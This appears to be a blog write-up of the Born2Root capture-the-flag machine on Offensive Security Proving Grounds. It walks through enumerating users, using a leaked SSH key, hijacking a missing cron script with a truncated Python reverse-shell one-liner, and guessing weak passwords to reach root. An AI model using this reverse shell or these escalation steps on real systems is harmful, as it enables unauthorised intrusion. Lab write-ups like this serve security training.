BORN2ROOT — Offensive Security

Offensive Security Proving Ground Complete Write-up

Exporting IP of the target machine as environment variable and scanned the target and found open ports and services as:

After switching up to port 80, three users found as martin, hadi, jimmy. COOL!!

After busting the directories with wfuzz, the results are

After hoping to icons directories and enumerating all the files , there’s was a file having ssh key

AWESOME!!, so we got three users, after trying with martin with password secret lab, it was a successful login

Enumerating the martin’s machine and found that in crontab,the file sekurity.py is running every five minutes which itself is missing in /tmp

So i created the same file name with reverse shell payload

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",0000));

with my knife listening on my root machine and yes, it was a good to go!

Enumerating the machine and found nothing special and only user left is hadi, so tried with hadi and with normal password of hadi123 and guess it worked!!!!

Enumerating the machine and after switching user with su command i tried with same password and was a successful login,

Clearly we are now root!!!

That’s all for now!!

Until Next Time,

Stay COOL!!!!

For any query, catch me on:

https://www.linkedin.com/in/user-neeleshpatel/

--

--

--

Cybersecurity | CTFs | Networking |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to vote for proposals in Cosmos Network in just 8 clicks

The Basic Steps Of eDiscovery

S-WALLET AS THE BEST FINANCIAL AGGREGATOR

Benefits of Running Your Own SIBEX Server

What is BlastDoor, and Why Apple included it in the iOS 14 update?

Earn Free Every 15 Minute 0.08 BTC 1 ETH 8BCH 24 LTC

HTB: Backdoor Walkthrough

Hard drive file leads to data breach

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Neelesh Patel

Neelesh Patel

Cybersecurity | CTFs | Networking |

More from Medium

Cutting-edge information security audits

Reversing crackmes.one challenge — Trycrackme

DevOps: Fad or Evolution?

GAARA — Offensive Security PG Play